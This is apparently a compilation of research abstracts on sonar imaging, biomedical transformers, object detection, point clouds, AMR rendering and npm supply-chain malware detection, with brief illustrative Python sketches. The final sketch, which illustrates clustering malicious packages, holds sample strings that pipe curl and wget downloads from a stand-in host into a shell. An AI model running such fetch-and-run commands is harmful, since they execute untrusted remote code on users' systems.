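print(select_action(ACTIONS, calm), select_action(ACTIONS, bold))
```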
Self-supervised learning has proved to be a powerful approach to learn image representations without the need of large labeled datasets. For underwater robotics, it is of great interest to design computer vision algorithms to improve perception capabilities such as sonar image classification. Due to the confidential nature of sonar imaging and the difficulty of interpreting sonar images, it is challenging to create public large labeled sonar datasets to train supervised learning algorithms. In this work, we investigate the potential of three self-supervised learning methods (RotNet, Denoising Autoencoders, and Jigsaw) to learn high-quality sonar image representation without the need of human labels. We present pre-training and transfer learning results on real-life sonar image datasets. Our results indicate that self-supervised pre-training yields classification performance comparable to supervised pre-training in a few-shot transfer learning setup across all three methods. Code and self-supervised pre-trained models are available at https://github.com/agrija9/ssl-sonar-images
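The RotNet pretext task mentioned above can be sketched without any real sonar data: each image yields four rotated copies whose rotation index serves as a free label, so no human annotations are needed. The 8x8 array below is synthetic:

```python
import numpy as np

def rotation_batch(image):
    """Return the four 90-degree rotations of `image` and their
    pretext-task labels (0 = 0 deg, 1 = 90 deg, 2 = 180 deg, 3 = 270 deg)."""
    images = [np.rot90(image, k) for k in range(4)]
    labels = list(range(4))
    return images, labels

img = np.arange(64).reshape(8, 8)        # synthetic stand-in for a sonar image
imgs, labels = rotation_batch(img)
print(labels)
```

A classifier trained to predict these labels must learn orientation-sensitive image features, which is what makes the representations transferable to downstream sonar classification.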
We introduce canonical weight normalization for convolutional neural networks. Inspired by the canonical tensor decomposition, we express the weight tensors in so-called canonical networks as scaled sums of outer vector products. In particular, we train network weights in the decomposed form, where scale weights are optimized separately for each mode. Additionally, similarly to weight normalization, we include a global scaling parameter. We study the initialization of the canonical form by running the power method and by drawing randomly from Gaussian or uniform distributions. Our results indicate that we can replace the power method with cheaper initializations drawn from standard distributions. The canonical re-parametrization leads to competitive normalization performance on the MNIST, CIFAR10, and SVHN data sets. Moreover, the formulation simplifies network compression. Once training has converged, the canonical form allows convenient model-compression by truncating the parameter sums.
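A minimal sketch of the canonical re-parametrization, assuming a three-mode weight tensor for brevity; the rank, shapes, and the single per-component scale (standing in for the separate per-mode scale weights) are illustrative only:

```python
import numpy as np

rng = np.random.default_rng(0)
O, I, K, R = 8, 4, 3, 5           # tensor modes and CP rank

# Factor vectors for each mode, plus component scales and a global scale.
A = rng.normal(size=(R, O))
B = rng.normal(size=(R, I))
C = rng.normal(size=(R, K))
scale = rng.normal(size=R)         # per-component scale weights (simplified)
g = 1.0                            # global scaling parameter

def reconstruct(A, B, C, scale, g, rank):
    """Rebuild the weight tensor as a scaled sum of outer vector products,
    keeping only the first `rank` components."""
    W = np.zeros((A.shape[1], B.shape[1], C.shape[1]))
    for r in range(rank):
        W += scale[r] * np.einsum("i,j,k->ijk", A[r], B[r], C[r])
    return g * W

W_full = reconstruct(A, B, C, scale, g, R)
W_small = reconstruct(A, B, C, scale, g, R - 2)   # truncated -> compressed
print(W_full.shape, W_small.shape)
```

Truncating the parameter sum, as in the last line, is the compression step: the smaller rank stores fewer factor vectors while producing a tensor of the same shape.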
Vietnam requires sustainable urbanization, for which city sensing is used in planning and decision-making. Large cities need portable, scalable, and inexpensive digital technology for this purpose. End-to-end air quality monitoring companies such as AirVisual and Plume Air have shown their reliability with portable devices outfitted with superior air sensors. These devices are pricey, yet homeowners use them to obtain local air data without evaluating causal effects. Our air quality inspection system is scalable, reasonably priced, and flexible. The system's minicomputer remotely monitors PMS7003 and BME280 sensor data through a microcontroller processor. The 5-megapixel camera module enables researchers to infer the causal relationship between traffic intensity and dust concentration. The design relies on inexpensive, commercial-grade hardware, with Azure Blob storing air pollution data and surrounding-area imagery and preventing the system from physically expanding. In addition, by including an air channel that replenishes and distributes temperature, the design improves ventilation and safeguards electrical components. The device allows for the analysis of the correlation between traffic and air quality data, which might aid in the establishment of sustainable urban development plans and policies.
Comparative study of 3D object detection frameworks based on LiDAR data and sensor fusion techniques
(2022)
Estimating and understanding the vehicle's surroundings precisely is the basic and crucial step for an autonomous vehicle. The perception system plays a significant role in providing an accurate interpretation of the vehicle's environment in real time. Generally, the perception system involves various subsystems such as localization, obstacle (static and dynamic) detection and avoidance, mapping systems, and others. For perceiving the environment, these vehicles are equipped with various exteroceptive (both passive and active) sensors, in particular cameras, radars, and LiDARs. These systems employ deep learning techniques that transform the huge amount of sensor data into semantic information on which the object detection and localization tasks are performed. For numerous driving tasks, accurate results require the location and depth information of a particular object. 3D object detection methods, by utilizing the additional pose data from sensors such as LiDARs and stereo cameras, provide information on the size and location of the object. Based on recent research, 3D object detection frameworks performing object detection and localization on LiDAR data and sensor fusion techniques show significant improvement in their performance. In this work, we conduct a comparative study of the effect of using LiDAR data in object detection frameworks and of the performance improvement obtained through sensor fusion techniques. Along the way, we discuss various state-of-the-art methods in both cases, perform experimental analyses, and provide future research directions.
Recent advances in Natural Language Processing have substantially improved contextualized representations of language. However, the inclusion of factual knowledge, particularly in the biomedical domain, remains challenging. Hence, many Language Models (LMs) are extended by Knowledge Graphs (KGs), but most approaches require entity linking (i.e., explicit alignment between text and KG entities). Inspired by single-stream multimodal Transformers operating on text, image and video data, this thesis proposes the Sophisticated Transformer trained on biomedical text and Knowledge Graphs (STonKGs). STonKGs incorporates a novel multimodal architecture based on a cross encoder that uses the attention mechanism on a concatenation of input sequences derived from text and KG triples, respectively. Over 13 million so-called text-triple pairs, coming from PubMed and assembled using the Integrated Network and Dynamical Reasoning Assembler (INDRA), were used in an unsupervised pre-training procedure to learn representations of biomedical knowledge in STonKGs. By comparing STonKGs to an NLP- and a KG-baseline (operating on either text or KG data) on a benchmark consisting of eight fine-tuning tasks, the proposed knowledge integration method applied in STonKGs was empirically validated. Specifically, on tasks with a comparatively small dataset size and a larger number of classes, STonKGs resulted in considerable performance gains, beating the F1-score of the best baseline by up to 0.083. Both the source code as well as the code used to implement STonKGs are made publicly available so that the proposed method of this thesis can be extended to many other biomedical applications.
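The single-stream concatenation described above can be sketched as a plain token sequence; the separator tokens and the triple below are invented for illustration and do not reflect the model's actual vocabulary:

```python
def build_input(text_tokens, triple):
    """Concatenate text tokens and a (head, relation, tail) KG triple
    into one input sequence for a single-stream cross encoder."""
    head, rel, tail = triple
    return ["[CLS]"] + text_tokens + ["[SEP]", head, rel, tail, "[SEP]"]

# Invented text-triple pair in the spirit of the pre-training data.
seq = build_input(["protein", "X", "inhibits", "Y"],
                  ("proteinX", "inhibits", "proteinY"))
print(seq)
```

Because both modalities share one sequence, the attention mechanism can relate any text token to any triple element directly, which is the point of the cross-encoder design.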
Contextual information is widely considered for NLP and knowledge discovery in life sciences since it highly influences the exact meaning of natural language. The scientific challenge is not only to extract such context data, but also to store this data for further query and discovery approaches. Classical approaches use RDF triple stores, which have serious limitations. Here, we propose a multiple step knowledge graph approach using labeled property graphs based on polyglot persistence systems to utilize context data for context mining, graph queries, knowledge discovery and extraction. We introduce the graph-theoretic foundation for a general context concept within semantic networks and show a proof of concept based on biomedical literature and text mining. Our test system contains a knowledge graph derived from the entirety of PubMed and SCAIView data and is enriched with text mining data and domain-specific language data using Biological Expression Language. Here, context is a more general concept than annotations. This dense graph has more than 71M nodes and 850M relationships. We discuss the impact of this novel approach with 27 real-world use cases represented by graph queries. Storing and querying a giant knowledge graph as a labeled property graph is still a technological challenge. Here, we demonstrate how our data model is able to support the understanding and interpretation of biomedical data. We present several real-world use cases that utilize our massive, generated knowledge graph derived from PubMed data and enriched with additional contextual data. Finally, we show a working example in context of biologically relevant information using SCAIView.
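A toy version of a labeled property graph with contextual edge properties; the real system uses a graph database at a vastly larger scale, and the nodes, relationship type, and context values here are invented:

```python
# Nodes carry labels; relationships carry properties, including context.
NODES = {
    "doc1":  {"label": "Document"},
    "geneX": {"label": "Gene"},
    "disY":  {"label": "Disease"},
}
EDGES = [
    ("geneX", "ASSOCIATED_WITH", "disY",
     {"context": "liver", "source": "doc1"}),
    ("geneX", "ASSOCIATED_WITH", "disY",
     {"context": "brain", "source": "doc1"}),
]

def query(edges, rel, context):
    """Return (subject, object) pairs of `rel` edges holding in `context`."""
    return [(s, o) for s, r, o, props in edges
            if r == rel and props.get("context") == context]

print(query(EDGES, "ASSOCIATED_WITH", "liver"))
```

Storing context as a relationship property, rather than as an annotation on nodes, is what lets the same gene-disease association hold in one context and not another.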
State-of-the-art object detectors are treated as black boxes due to their highly non-linear internal computations. Even with unprecedented advancements in detector performance, the inability to explain how their outputs are generated limits their use in safety-critical applications. Previous work fails to produce explanations for both bounding box and classification decisions, and generally makes individual explanations for various detectors. In this paper, we propose an open-source Detector Explanation Toolkit (DExT) which implements the proposed approach to generate a holistic explanation for all detector decisions using certain gradient-based explanation methods. We suggest various multi-object visualization methods to merge the explanations of multiple objects detected in an image as well as the corresponding detections in a single image. The quantitative evaluation shows that the Single Shot MultiBox Detector (SSD) is more faithfully explained compared to other detectors regardless of the explanation methods. Both quantitative and human-centric evaluations identify that SmoothGrad with Guided Backpropagation (GBP) provides more trustworthy explanations among selected methods across all detectors. We expect that DExT will motivate practitioners to evaluate object detectors from the interpretability perspective by explaining both bounding box and classification decisions.
21 pages, with supplementary
ProtSTonKGs: A Sophisticated Transformer Trained on Protein Sequences, Text, and Knowledge Graphs
(2022)
While most approaches individually exploit unstructured data from the biomedical literature or structured data from biomedical knowledge graphs, their union can better exploit the advantages of such approaches, ultimately improving representations of biology. Using multimodal transformers for such purposes can improve performance on context-dependent classification tasks, as demonstrated by our previous model, the Sophisticated Transformer Trained on Biomedical Text and Knowledge Graphs (STonKGs). In this work, we introduce ProtSTonKGs, a transformer aimed at learning all-encompassing representations of protein-protein interactions. ProtSTonKGs presents an extension to our previous work by adding textual protein descriptions and amino acid sequences (i.e., structural information) to the text- and knowledge graph-based input sequence used in STonKGs. We benchmark ProtSTonKGs against STonKGs, resulting in improved F1 scores by up to 0.066 (i.e., from 0.204 to 0.270) in several tasks such as predicting protein interactions in several contexts. Our work demonstrates how multimodal transformers can be used to integrate heterogeneous sources of information, paving the foundation for future approaches that use multiple modalities for biomedical applications.
Effective Neighborhood Feature Exploitation in Graph CNNs for Point Cloud Object-Part Segmentation
(2022)
Part segmentation is the task of semantic segmentation applied on objects and carries a wide range of applications from robotic manipulation to medical imaging. This work deals with the problem of part segmentation on raw, unordered point clouds of 3D objects. While pioneering works on deep learning for point clouds typically ignore the local geometric structure around individual points, the subsequent methods proposed to extract features by exploiting local geometry have not yielded significant improvements either. In order to investigate further, a graph convolutional network (GCN) is used in this work in an attempt to increase the effectiveness of such neighborhood feature exploitation approaches. Most of the previous works also focus only on segmenting complete point cloud data. Considering the impracticality of such approaches in real-world scenarios, where complete point clouds are scarcely available, this work also proposes approaches to deal with partial point cloud segmentation.
In the attempt to better capture neighborhood features, this work proposes a novel method to learn regional part descriptors which guide and refine the segmentation predictions. The proposed approach helps the network achieve state-of-the-art performance of 86.4% mIoU on the ShapeNetPart dataset for methods which do not use any preprocessing techniques or voting strategies. In order to better deal with partial point clouds, this work also proposes new strategies to train and test on partial data. While achieving significant improvements compared to the baseline performance, the problem of partial point cloud segmentation is also viewed through an alternate lens of semantic shape completion.
Semantic shape completion networks not only help deal with partial point cloud segmentation but also enrich the information captured by the system by predicting complete point clouds with corresponding semantic labels for each point. To this end, a new network architecture for semantic shape completion is also proposed based on point completion network (PCN) which takes advantage of a graph convolution based hierarchical decoder for completion as well as segmentation. In addition to predicting complete point clouds, results indicate that the network is capable of reaching within a margin of 5% to the mIoU performance of dedicated segmentation networks for partial point cloud segmentation.
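One neighborhood-feature aggregation step of the kind such graph CNNs apply to point clouds (EdgeConv-style) can be sketched as follows; the random matrix stands in for a trained layer, and the point set and neighborhood size are illustrative only:

```python
import numpy as np

rng = np.random.default_rng(0)
points = rng.normal(size=(6, 3))        # 6 points with 3-D features
W = rng.normal(size=(3, 4))             # stand-in for a learned layer
k = 2                                   # neighbors per point

def knn(points, k):
    """Indices of the k nearest neighbors of each point (excluding itself)."""
    d = np.linalg.norm(points[:, None] - points[None, :], axis=-1)
    return np.argsort(d, axis=1)[:, 1:k + 1]

def edge_conv(points, W, k):
    """Max-pool transformed edge features (x_j - x_i) over each
    point's neighborhood, yielding one feature vector per point."""
    idx = knn(points, k)
    edges = points[idx] - points[:, None, :]      # (N, k, 3) edge vectors
    return np.maximum(edges @ W, 0).max(axis=1)   # ReLU, then max over k

out = edge_conv(points, W, k)
print(out.shape)
```

Building features from relative offsets (x_j - x_i) rather than raw coordinates is what lets the layer capture local geometric structure around each point.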
As cameras are ubiquitous in autonomous systems, object detection is a crucial task. Object detectors are widely used in applications such as autonomous driving, healthcare, and robotics. Given an image, an object detector outputs both the bounding box coordinates as well as classification probabilities for each object detected. The state-of-the-art detectors are treated as black boxes due to their highly non-linear internal computations. Even with unprecedented advancements in detector performance, the inability to explain how their outputs are generated limits their use in safety-critical applications in particular. It is therefore crucial to explain the reason behind each detector decision in order to gain user trust, enhance detector performance, and analyze their failure.
Previous work fails to explain as well as evaluate both bounding box and classification decisions individually for various detectors. Moreover, no tools explain each detector decision, evaluate the explanations, and also identify the reasons for detector failures. This restricts the flexibility to analyze detectors. The main contribution presented here is an open-source Detector Explanation Toolkit (DExT). It is used to explain the detector decisions, evaluate the explanations, and analyze detector errors. The detector decisions are explained visually by highlighting the image pixels that most influence a particular decision. The toolkit implements the proposed approach to generate a holistic explanation for all detector decisions using certain gradient-based explanation methods. To the author’s knowledge, this is the first work to conduct extensive qualitative and novel quantitative evaluations of different explanation methods across various detectors. The qualitative evaluation incorporates a visual analysis of the explanations carried out by the author as well as a human-centric evaluation. The human-centric evaluation includes a user study to understand user trust in the explanations generated across various explanation methods for different detectors. Four multi-object visualization methods are provided to merge the explanations of multiple objects detected in an image as well as the corresponding detector outputs in a single image. Finally, DExT implements the procedure to analyze detector failures using the formulated approach.
The visual analysis illustrates that the ability to explain a model is more dependent on the model itself than the actual ability of the explanation method. In addition, the explanations are affected by the object explained, the decision explained, detector architecture, training data labels, and model parameters. The results of the quantitative evaluation show that the Single Shot MultiBox Detector (SSD) is more faithfully explained compared to other detectors regardless of the explanation methods. In addition, a single explanation method cannot generate more faithful explanations than other methods for both the bounding box and the classification decision across different detectors. Both the quantitative and human-centric evaluations identify that SmoothGrad with Guided Backpropagation (GBP) provides more trustworthy explanations among selected methods across all detectors. Finally, a convex polygon-based multi-object visualization method provides more human-understandable visualization than other methods.
The author expects that DExT will motivate practitioners to evaluate object detectors from the interpretability perspective by explaining both bounding box and classification decisions.
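A gradient-based explanation of a single detector decision reduces, in miniature, to the gradient magnitude of one chosen output (a class score or one bounding-box coordinate) with respect to each pixel. The toy nonlinear "heads" below stand in for a real detector; all names are illustrative:

```python
import numpy as np

rng = np.random.default_rng(1)
x = rng.normal(size=16)                 # flattened input "image"
w_cls = rng.normal(size=16)             # toy classification head weights
w_box = rng.normal(size=16)             # toy box-coordinate head weights

def cls_score(x):
    return np.tanh(w_cls @ x)           # nonlinear stand-in for a class score

def box_coord(x):
    return np.tanh(w_box @ x)           # stand-in for one box coordinate

def saliency(f, x, eps=1e-5):
    """Numerical gradient magnitude of decision f w.r.t. each pixel:
    the per-pixel saliency map for that decision."""
    grad = np.zeros_like(x)
    for i in range(x.size):
        d = np.zeros_like(x)
        d[i] = eps
        grad[i] = (f(x + d) - f(x - d)) / (2 * eps)
    return np.abs(grad)

cls_map = saliency(cls_score, x)        # explains the classification decision
box_map = saliency(box_coord, x)        # explains the bounding-box decision
print(cls_map.shape, box_map.shape)
```

Explaining each decision separately, as in the last two lines, mirrors the point made above: a box decision and a class decision for the same object can depend on different pixels.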
We describe a systematic approach for rendering time-varying simulation data produced by exa-scale simulations, using GPU workstations. The data sets we focus on use adaptive mesh refinement (AMR) to overcome memory bandwidth limitations by representing interesting regions in space with high detail. Particularly, our focus is on data sets where the AMR hierarchy is fixed and does not change over time. Our study is motivated by the NASA Exajet, a large computational fluid dynamics simulation of a civilian cargo aircraft that consists of 423 simulation time steps, each storing 2.5 GB of data per scalar field, amounting to a total of 4 TB. We present strategies for rendering this time series data set with smooth animation and at interactive rates using current generation GPUs. We start with an unoptimized baseline and step by step extend that to support fast streaming updates. Our approach demonstrates how to push current visualization workstations and modern visualization APIs to their limits to achieve interactive visualization of exa-scale time series data sets.
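The streaming update pattern can be sketched as classic double buffering: render the front buffer while the next time step loads into the back buffer, then swap. Loading here is a synchronous stand-in for an asynchronous GPU upload, and the step data is a placeholder string:

```python
def load_step(t):
    """Stand-in for reading one time step's scalar field from disk."""
    return f"field@{t}"

def stream(num_steps):
    """Yield (rendered step, prefetched step) per frame using two buffers."""
    front = load_step(0)                 # buffer currently being rendered
    for t in range(num_steps):
        # Prefetch the next step while the current one is "rendered".
        back = load_step(t + 1) if t + 1 < num_steps else None
        yield front, back
        if back is not None:
            front, back = back, front    # swap buffers for the next frame

frames = list(stream(3))
print(frames)
```

Keeping the upload off the render path is what preserves smooth animation: the renderer never waits on disk I/O for the step it is currently drawing.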
Trojanized software packages used in software supply chain attacks constitute an emerging threat. Unfortunately, there is still a lack of scalable approaches that allow automated and timely detection of malicious software packages, and thus most detections are based on manual labor and expertise. However, it has been observed that most attack campaigns comprise multiple packages that share the same or similar malicious code. We leverage that fact to automatically reproduce manually identified clusters of known malicious packages that have been used in real-world attacks, thus reducing the need for expert knowledge and manual inspection. Our approach, AST Clustering using MCL to mimic Expertise (ACME), yields promising results with an F1 score of 0.99. Signatures are automatically generated based on characteristic code fragments from clusters and are subsequently used to scan the whole npm registry for unreported malicious packages. We are able to identify and report six malicious packages, which were consequently removed from npm. Therefore, our approach can support detection by reducing manual labor and hence may be employed by maintainers of package repositories to detect possible software supply chain attacks through trojanized software packages.
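The clustering idea can be sketched at toy scale: fingerprint each package's code structurally and group packages whose fingerprints are near-identical. Jaccard similarity over AST node types plus a threshold stands in here for ACME's actual features and MCL step, and the "packages" are invented Python snippets rather than real npm code:

```python
import ast
from itertools import combinations

# Invented snippets: two share the same malicious structure, one is benign.
SNIPPETS = {
    "pkg-a": "import os\nos.system('curl evil.example | sh')",
    "pkg-b": "import os\nos.system('wget evil.example -O- | sh')",
    "pkg-c": "def add(a, b):\n    return a + b",
}

def ast_profile(code):
    """Set of AST node type names: a crude structural fingerprint."""
    return {type(n).__name__ for n in ast.walk(ast.parse(code))}

def similar_pairs(snippets, threshold=0.8):
    """Pairs of packages whose AST profiles have Jaccard >= threshold."""
    profiles = {name: ast_profile(src) for name, src in snippets.items()}
    pairs = []
    for a, b in combinations(sorted(profiles), 2):
        inter = len(profiles[a] & profiles[b])
        union = len(profiles[a] | profiles[b])
        if inter / union >= threshold:
            pairs.append((a, b))
    return pairs

print(similar_pairs(SNIPPETS))
```

Structural fingerprints are deliberately blind to superficial edits (changed URLs, renamed strings), which is why campaign packages with lightly varied payloads still cluster together.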